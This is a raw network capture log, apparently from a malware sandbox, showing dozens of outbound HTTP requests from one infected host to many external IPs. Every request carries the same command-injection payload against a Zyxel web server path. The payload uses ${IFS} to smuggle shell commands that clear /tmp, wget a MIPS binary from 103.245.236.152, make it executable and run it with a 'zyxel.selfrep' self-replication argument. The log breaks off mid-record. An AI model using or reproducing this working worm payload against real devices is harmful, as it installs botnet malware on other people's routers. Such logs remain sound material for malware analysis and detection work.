                                          Jan 14, 2024 15:46:15.985568047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4327192.168.2.234006878.137.169.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985589981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4328192.168.2.2346126101.87.240.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985616922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4329192.168.2.2340984113.143.111.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985651970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4330192.168.2.234228249.129.147.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985672951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4331192.168.2.2343658104.84.42.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985685110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4332192.168.2.2338912217.200.192.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985732079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4333192.168.2.2353666107.93.40.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985780954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4334192.168.2.235557461.219.140.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985795975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4335192.168.2.234520860.55.26.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985817909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4336192.168.2.233992035.31.174.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985857010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4337192.168.2.2354306126.1.119.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985892057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4338192.168.2.2333384109.84.82.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985902071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4339192.168.2.235734270.207.123.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985928059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4340192.168.2.2353042164.31.137.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985984087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4341192.168.2.2345454130.168.67.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986013889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4342192.168.2.2336388194.196.141.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986043930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4343192.168.2.2347270177.226.196.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986088037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4344192.168.2.2341698207.169.202.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986115932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4345192.168.2.2350980157.121.222.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986133099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4346192.168.2.2356536184.42.186.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986150980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4347192.168.2.23456649.179.56.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986200094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4348192.168.2.234031613.146.31.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.986213923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4349192.168.2.2359036200.23.0.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989183903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4350192.168.2.235524490.73.168.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989197969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4351192.168.2.233743273.253.60.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989204884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4352192.168.2.2337962202.88.42.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989232063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4353192.168.2.2356958125.30.157.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989267111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4354192.168.2.2335606184.134.203.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989289045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4355192.168.2.2332778114.23.143.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989320993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4356192.168.2.2343864128.62.195.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.989346027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4357192.168.2.2352670193.157.241.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007425070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4358192.168.2.234302053.181.201.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007433891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4359192.168.2.2335974209.179.44.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007472038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4360192.168.2.235784213.1.156.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007502079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4361192.168.2.234337845.249.251.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007502079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4362192.168.2.236000685.90.170.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007508993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4363192.168.2.235983650.209.70.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007527113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4364192.168.2.2349758162.94.246.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007550001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4365192.168.2.234015871.74.193.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007637978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4366192.168.2.2333008133.197.149.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007666111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4367192.168.2.2350816187.145.72.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007668972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4368192.168.2.23388509.21.80.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007687092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4369192.168.2.235383013.152.195.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007707119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4370192.168.2.2356364138.224.106.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007740021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4371192.168.2.233381425.55.248.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007752895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4372192.168.2.236078899.156.83.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007775068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4373192.168.2.2348170184.126.104.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007822037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4374192.168.2.233985227.60.20.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007868052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4375192.168.2.2355868193.241.128.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007868052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4376192.168.2.2353142170.214.109.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007901907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4377192.168.2.2334200117.220.61.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.007956982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4378192.168.2.2355122163.83.190.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008008957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4379192.168.2.234032264.31.234.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008068085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4380192.168.2.235604880.232.119.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008104086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4381192.168.2.234927474.71.131.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008125067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4382192.168.2.2359944151.81.128.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008131027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4383192.168.2.2334290191.71.244.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008151054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4384192.168.2.2354892193.141.8.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008183956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4385192.168.2.235353831.72.240.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008241892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4386192.168.2.234734414.222.217.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008264065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4387192.168.2.2352124218.200.246.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008280993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4388192.168.2.2334830113.97.30.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008322954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4389192.168.2.2353396115.44.103.157443
                                          TimestampBytes transferredDirectionData
